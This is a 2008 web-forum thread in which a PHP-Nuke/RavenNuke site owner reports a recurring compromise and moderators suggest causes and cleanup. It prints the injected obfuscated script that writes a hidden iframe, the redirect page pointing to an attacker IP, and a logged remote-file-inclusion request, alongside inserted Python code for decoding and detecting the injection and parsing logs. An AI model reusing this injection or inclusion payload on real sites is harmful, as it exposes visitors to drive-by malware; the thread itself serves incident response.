Ravens PHP Scripts: Forums

Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
lokasher
New Member
Joined: Mar 27, 2006
Posts: 17

Posted: Sat Nov 01, 2008 6:22 am

Hi there,

This script is written in each and every .php and .html file.

Code:


<script>
var temp="",i,c=0,out="";
var if_uniq_var="29102008";
var start_time="31 Oct 2008 19:38:00";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!105!112!111!100!115!117!120!120!46!104!116!109!108!34!32
!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
}
document.write(out);
</script>


and this file, ipodsuxx.html, with the code

Code:


<html>
<head>
<meta http-equiv="refresh" content="1;URL=http://91.203.93.49/cgi-bin/index.cgi?iu1">
</head>
<body>
</body>
</html>


is in every folder, no matter how many times I remove and edit files.
I was using phpnuke 8.0 patched, but two weeks back I downgraded to RN 2.3 thinking this might solve my problem, but this script and file keep coming back.
Can someone please help me solve my problem?

[Admin: I split the code to avoid scrolling]

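Added example, not part of the original post or of any RavenNuke code: a Python decoder for the bang-separated character codes in the script above, plus a scanner that flags the same pattern in page text and reports the iframe the payload would write. The sample page is constructed from the posted script with the split str literal rejoined.

```python
import re

# Constructed sample: the injected <script> from the post, with the split str
# literal rejoined (the forum admin split it to avoid scrolling). Each
# "!"-terminated decimal is one character code that the loop feeds to fromCharCode.
PAYLOAD = ("60!105!102!114!97!109!101!32!115!114!99!61!34!105!112!111!100!115!117!120!120!46"
           "!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32"
           "!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62"
           "!60!47!105!102!114!97!109!101!62!")
SAMPLE_PAGE = (
    "<html><body><p>legitimate page content</p>\n"
    '<script>\nvar temp="",i,c=0,out="";\nvar if_uniq_var="29102008";\n'
    'var str="' + PAYLOAD + '";\n'
    "while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);"
    'c++;out=out+String.fromCharCode(temp);temp="";}\ndocument.write(out);\n</script>\n'
    "</body></html>"
)

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
STR_RE = re.compile(r'var\s+str\s*=\s*"([0-9!\s]+)"')


def decode_bang_charcodes(encoded):
    """Reverse the sample's loop: split on '!' and map each decimal to its character."""
    return "".join(chr(int(tok)) for tok in encoded.split("!") if tok.strip())


def find_injections(page_text):
    """Return (encoded, decoded) for every script block shaped like the injected one:
    a bang-separated numeric str pushed through fromCharCode into document.write."""
    hits = []
    for block in SCRIPT_RE.findall(page_text):
        if "fromCharCode" not in block or "document.write" not in block:
            continue
        match = STR_RE.search(block)
        if match:
            hits.append((match.group(1), decode_bang_charcodes(match.group(1))))
    return hits


def hidden_iframe_targets(decoded_html):
    """src= of any iframe the decoded payload would write into the page."""
    return re.findall(r'<iframe[^>]*\bsrc="([^"]+)"', decoded_html, re.I)


if __name__ == "__main__":
    for encoded, decoded in find_injections(SAMPLE_PAGE):
        print("decoded payload:", decoded)
        print("iframe targets :", hidden_iframe_targets(decoded))
```

Run find_injections over the text of each .php and .html file under the web root to locate every copy of the injection rather than grepping for one literal string.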
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17086

Posted: Sat Nov 01, 2008 10:58 am

Looks like you have been hacked and there is a script installed somewhere, either on your server or within your root folder, that is adding the code to your scripts. Hosting with DreamHost by any chance? See [link visible only to registered users].

Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

Posted: Sat Nov 01, 2008 12:36 pm

I was conversing with a young guy on a forum elsewhere and his host (who will remain nameless) tried to charge the guy $275 to fix what they said was his problem on a fully managed VPS.
If I said it was the same problem it would give the game away so let me say it was a similar exploit.

lokasher
Posted: Sat Nov 01, 2008 2:45 pm

Thanks for the reply,
no, it's not DreamHost.
I talked with them and they said they will upgrade the server, using php 4.2 at the moment I guess.
Is there any solution? I mean, if it's installed in my root folder, can I delete it?
thanks
 
Raven
Posted: Sat Nov 01, 2008 4:15 pm

Whether it's Dreamhost or not the issue is the same. Read that thread mentioned above and try to do what is outlined in it. 4.2 - YIKES! I'd find another host but regardless, if they think upgrading php is the answer then they don't have a clue. Bail while you have a chance.
 
Guardian2003
Posted: Sat Nov 01, 2008 7:01 pm

I have to agree with Raven and for the same reasons.
If they think upgrading PHP (regardless of the version number) will fix anything that is very, very worrying.
 
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221

Posted: Sun Nov 02, 2008 12:52 am

Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.

Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded.

lokasher
Posted: Mon Nov 03, 2008 2:10 am

evaders99 wrote:
Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.

Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded.

I did that already 2 times, but no use, these files keep coming back.
 
Raven
Posted: Mon Nov 03, 2008 3:52 am

Then that means either your backup contains the hacked scripts or the server itself is compromised. You will probably need to get your host involved to check the logs or whatever and help you locate the source of the hack and remove it.
 
lokasher
Posted: Mon Nov 03, 2008 6:25 am

I installed fresh RN 2.3, didn't use the backup file.
 
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3191
Location: Germany: Moderator German NukeSentinel Support

Posted: Mon Nov 03, 2008 8:28 am

Did you already scan your system?
[link visible only to registered users]

or:
[link visible only to registered users]

Raven
Posted: Mon Nov 03, 2008 10:18 am

lokasher wrote:
I installed fresh RN 2.3, didn't use the backup file.

Then it's a server issue and your host needs to get involved.
 
lokasher
Posted: Mon Nov 03, 2008 3:24 pm

Susann wrote:
Did you already scan your system?

Yes, I did that,
scanned my PC and the backup files, didn't find anything.
Then I searched for that script in all files; again all files were clear except backend.php, which contained the script (maybe that's because the backup was created at the time when I was replacing the files), but I'm sure I replaced it with all the other files.
Anyway, today again I deleted all files and folders and replaced them with new ones. Let's see now what happens.
Raven wrote:
Then it's a server issue and your host needs to get involved.


This is what they told me:

Thank you for using our services!

Please note that most hackers' attacks are usually done through vulnerabilities in the website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such software. From our side, we keep all server-side software (web services, FTP services, etc.) up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in the website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

As we are using shared servers, it is not possible to perform a server-side check of all the data being hosted. There are too many files and folders hosted in customers' directories, though we are performing whole system updates and maintenance as frequently as needed. Thus all viruses uploaded to software or features installed on the server are removed automatically, but we are not responsible for the contents placed in your domain directory.

The virus could have been uploaded to the server when you made an update to your website from the local backup. I would recommend you download all the site data to your local PC and scan the whole system for viruses, including the website files. Then, please, re-upload it to the server.

Please let us know if there is anything else we can help you with. We are available 24/7.
 
Raven
Posted: Mon Nov 03, 2008 3:47 pm

Get a new host - seriously. These guys don't have a clue!

Check your foot1 - foot3 settings in your config table using phpMyAdmin to see if there's code in there that is redirecting to a hacker script.

Check your cgi-bin folder to see if there are scripts that don't belong in there.

This will not be a virus, per se. So scanning your scripts will not (necessarily) detect a "footprint" as virus scanners do. There is a script that is running either within your account files or on the server that has to be adding those files.

Make sure that when you are examining your site using FTP that your FTP client is being invoked with the remote file mask of -a.
 
Susann
Posted: Mon Nov 03, 2008 4:19 pm

That sounds like a typical standard answer from a hoster, but it's true they are not responsible for the content of your domain.

I personally believe one scan isn't enough to be sure a system isn't infected anymore.

Maybe you eliminated it with the new backend.php, but I would still check my logs and files. RavenNuke(tm) is very safe. That's all I can tell you, because I never had such a problem and I have used Nuke, and in particular RavenNuke(tm), for years.

Btw: The webmaster from a Joomla site with the same issue also did not find anything when he scanned his PC. But like I said above that means nothing.
 
Raven
Posted: Mon Nov 03, 2008 6:06 pm

lokasher,

Did you find this file on your system - gz_eolas_fix.js?
 
lokasher
Posted: Tue Nov 04, 2008 3:19 am

Raven wrote:
lokasher,

Did you find this file on your system - gz_eolas_fix.js?

Nope, this file is nowhere, either on my PC or the server.
Footer messages are clean and so is the cgi-bin folder.
Antivirus didn't detect the script in backend.php; I found it by a text search in all files. Just waiting till tomorrow to see what happens, because the virus was coming back after 3 days.
 
lokasher
Posted: Thu Nov 06, 2008 1:25 am

So far it's ok, nothing happened, hope it stays that way.
Thank you guys for your time and replies.
 
Raven
Posted: Thu Nov 06, 2008 1:36 am

RavensScripts
 
lokasher
Posted: Fri Nov 07, 2008 3:05 pm

I'm getting daily around 30 to 40 Blocked abuse emails from this link with different IP addresses. Any info on what this is and how to block it permanently?
thanks

Code:


Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2008-11-06 04:58:12 CST GMT -0600
Blocked IP: 118.6.230.117
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP Host: [link visible only to registered users]
Script Name: /modules.php
Query String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Get String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 118.6.230.117
Remote Port: 2397
Request Method: GET
 
Susann
Posted: Fri Nov 07, 2008 6:04 pm

Check this:
[link visible only to registered users]
 
lokasher
Posted: Sat Nov 08, 2008 7:42 am

Thanks once again .
 
lokasher
Posted: Thu Nov 13, 2008 9:13 am

It started again.

2 days back I found a strange file in the root dir. After deleting that, I checked the log and I found this, where this file was first called:

Code:


85.17.184.28 - - [11/Nov/2008:09:52:45 -0600] "GET /fins.html HTTP/1.1" 301 316 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:46 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:47 -0600] "GET /fins.html HTTP/1.1" 302 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 301 324 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:49 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 404 15417 "-" "Python-urllib/2.5"

and today again an html file was in each and every folder, plus the script was added to files with php and html extensions,
but this time the script was added only to the files in the /admin and /blocks/shortlinks folders.
In the log:
Code:


116.71.63.78 - - [13/Nov/2008:05:39:44 -0600] "GET /iu2.html HTTP/1.0" 200 135 "http://www.xxxxxx.com/" "Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1"

Any help on this please?
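Added example, not the poster's or the project's code: a parser for the Apache combined-format lines quoted above that answers the question asked in this post (which request first touched a given file, from where, with what client) and lists clients using script or library user agents. The sample lines are taken from the post; the non-browser prefix list is an assumed heuristic.

```python
import re

# Sample input constructed from the access-log lines quoted in the thread
# (Apache combined log format, chronological as the server writes it).
LOG_LINES = '''85.17.184.28 - - [11/Nov/2008:09:52:45 -0600] "GET /fins.html HTTP/1.1" 301 316 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:46 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"
85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 301 324 "-" "Python-urllib/2.5"
116.71.63.78 - - [13/Nov/2008:05:39:44 -0600] "GET /iu2.html HTTP/1.0" 200 135 "http://www.xxxxxx.com/" "Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1"
'''.splitlines()

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Assumed heuristic list of non-browser clients; the thread itself shows only Python-urllib.
LIBRARY_UA_PREFIXES = ("Python-urllib", "libwww-perl", "curl/", "Wget/")


def parse_combined(line):
    """One combined-format line to a dict of fields, or None if it does not parse."""
    match = COMBINED_RE.match(line)
    return match.groupdict() if match else None


def first_seen(lines, suspect_names):
    """Earliest request for each suspect filename: (time, client IP, status, user agent).
    Matches on the final path component so /fins.html and /xxxxxxx/fins.html both count."""
    seen = {}
    for rec in filter(None, map(parse_combined, lines)):
        name = rec["path"].split("?", 1)[0].rsplit("/", 1)[-1]
        if name in suspect_names and name not in seen:
            seen[name] = (rec["time"], rec["ip"], rec["status"], rec["ua"])
    return seen


def library_clients(lines):
    """Client IPs whose user agent is a script/library, with the paths each one touched."""
    clients = {}
    for rec in filter(None, map(parse_combined, lines)):
        if rec["ua"].startswith(LIBRARY_UA_PREFIXES):
            clients.setdefault(rec["ip"], set()).add(rec["path"])
    return clients


if __name__ == "__main__":
    for name, info in first_seen(LOG_LINES, {"fins.html", "iu2.html"}).items():
        print(name, "first requested at", info[0], "by", info[1], "status", info[2])
    print("library clients:", library_clients(LOG_LINES))
```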
 
evaders99
Posted: Thu Nov 13, 2008 11:18 am

Was the server actually cleaned and reformatted? Or was the only thing that was done loading clean RavenNuke 2.3 files?
 
lokasher
Posted: Thu Nov 13, 2008 12:58 pm

evaders99 wrote:
Was the server actually cleaned and reformatted? Or was the only thing that was done loading clean RavenNuke 2.3 files?

Deleted old files and uploaded RN 2.3, that's all.
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours